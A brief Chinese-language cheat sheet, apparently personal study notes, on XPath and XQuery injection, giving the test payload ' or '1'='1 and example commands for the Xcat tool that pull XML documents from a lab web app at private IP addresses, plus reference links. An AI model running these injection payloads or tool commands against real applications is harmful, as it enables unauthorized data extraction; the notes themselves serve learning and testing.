XPath注入
XQuery注入
測試語句:'or '1'='1
利用工具:
Xcat介紹
Xcat是python的指令行程式利用Xpath的注入漏洞在Web應用中檢索XML文檔
下載下傳位址:https://github.com/orf/xcat
使用說明:http://xcat.readthedocs.io/en/latest/#about-xcat
python3.4.1環境 pip install xcat
常用指令讀取xml檔案:
xcat.py --method=GET --public-ip="192.168.91.139" http://192 .168.91.139/xml/example2.php name=hacker name "Hello hacker" run retrieve
xcat "http://192.168.8.130/xml/example2.php" name name=hacker -m GET -o 192.168.8.130 -t "Hello hacker" -s
參考資料:
XPath Hacking技術科普 http://www.freebuf.com/articles/web/23184.html
XPath盲注簡介 http://blog.csdn.net/yefan2222/article/details/7227932
![27. Remove Element(清單)題目代碼[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)